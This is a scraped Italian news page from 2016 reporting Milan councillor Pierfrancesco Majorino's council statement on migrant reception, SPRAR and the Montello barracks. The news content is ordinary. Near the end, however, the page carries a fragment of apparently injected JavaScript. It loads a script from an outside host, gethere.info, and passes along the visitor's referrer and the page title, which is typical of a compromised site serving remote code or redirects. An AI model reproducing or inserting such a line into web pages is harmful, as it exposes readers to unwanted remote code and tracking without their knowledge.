"/>
giovedì 19 ottobre 2017 22:01:09
omnimilano

MIGRANTI, MAJORINO: “FAREMO ANCORA, NON DIREMO ‘GIA’ DATO'”

26 settembre 2016 Politica

Per l'accoglienza dei profughi “abbiamo fatto e faremo ancora. Non diremo 'abbiamo gia' dato', ma chiediamo un chiaro cambio di passo”. Lo ha detto l'assessore alle Politiche sociali Pierfrancesco Majorino in consiglio comunale, nella sua relazione in aula sulla situazione dei migranti in citta', nella seduta dedicata a questo tema. Per Majorino la gestione dei migranti “non puo' essere un gioco a chiamarsi fuori”, piuttosto “va potenziato lo Sprar, come diciamo da tempo anche in Anci e scommettere sempre piu' su un sistema in cui convivano centri con un numero di presenze significativo e un'accoglienza diffusa”. In questo la soluzione della caserma Montello “va perseguita: si va avanti fino al termine del 2017, poi si deve procedere al recupero” della struttura, ha spiegato Majorino, e saranno ospitati “al massimo 300 richiedenti asilo, non solo uomini ma anche famiglie”, ha assicurato e “saremmo dei pazzi se pensassimo di chiamarci fuori da quello che succedera' dentro e fuori la caserma”.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo